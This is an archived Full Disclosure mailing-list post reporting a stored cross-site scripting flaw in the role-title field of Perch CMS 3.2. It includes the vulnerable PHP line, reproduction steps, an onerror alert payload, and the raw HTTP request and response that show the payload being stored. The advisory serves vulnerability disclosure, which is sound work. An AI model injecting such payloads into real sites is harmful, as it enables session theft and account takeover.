lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAF2Wu1a4fjkSpjAANXCoy_cV_mZbc4Jpw0R4FvkBHbvPgpMBRw@mail.gmail.com>
Date: Thu, 27 Jul 2023 23:34:24 +0300
From: Andrey Stoykov <mwebsec@...il.com>
To: Fulldisclosure@...lists.org
Subject: [FD] Stored XSS - Perch

# Exploit Title:
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 3.2
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com


XSS #1:

File: roles.edit.post.php

Line #57:

[...]
<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">
        <?php echo $Form->label('roleTitle', 'Title'); ?>
        <div class="form-entry">
            <?php echo $Form->text('roleTitle', $Form->get($details,
'roleTitle')); ?>
        </div>
    </div>
[...]



Steps to Reproduce:

1. Login to application
2. Go to Roles
3. Select Title
4. Enter payload TEST"><img src=x onerror=alert(1)>


// HTTP POST request

POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
[...]

roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
[...]

[...]
<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x
onerror=alert(1)></a>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ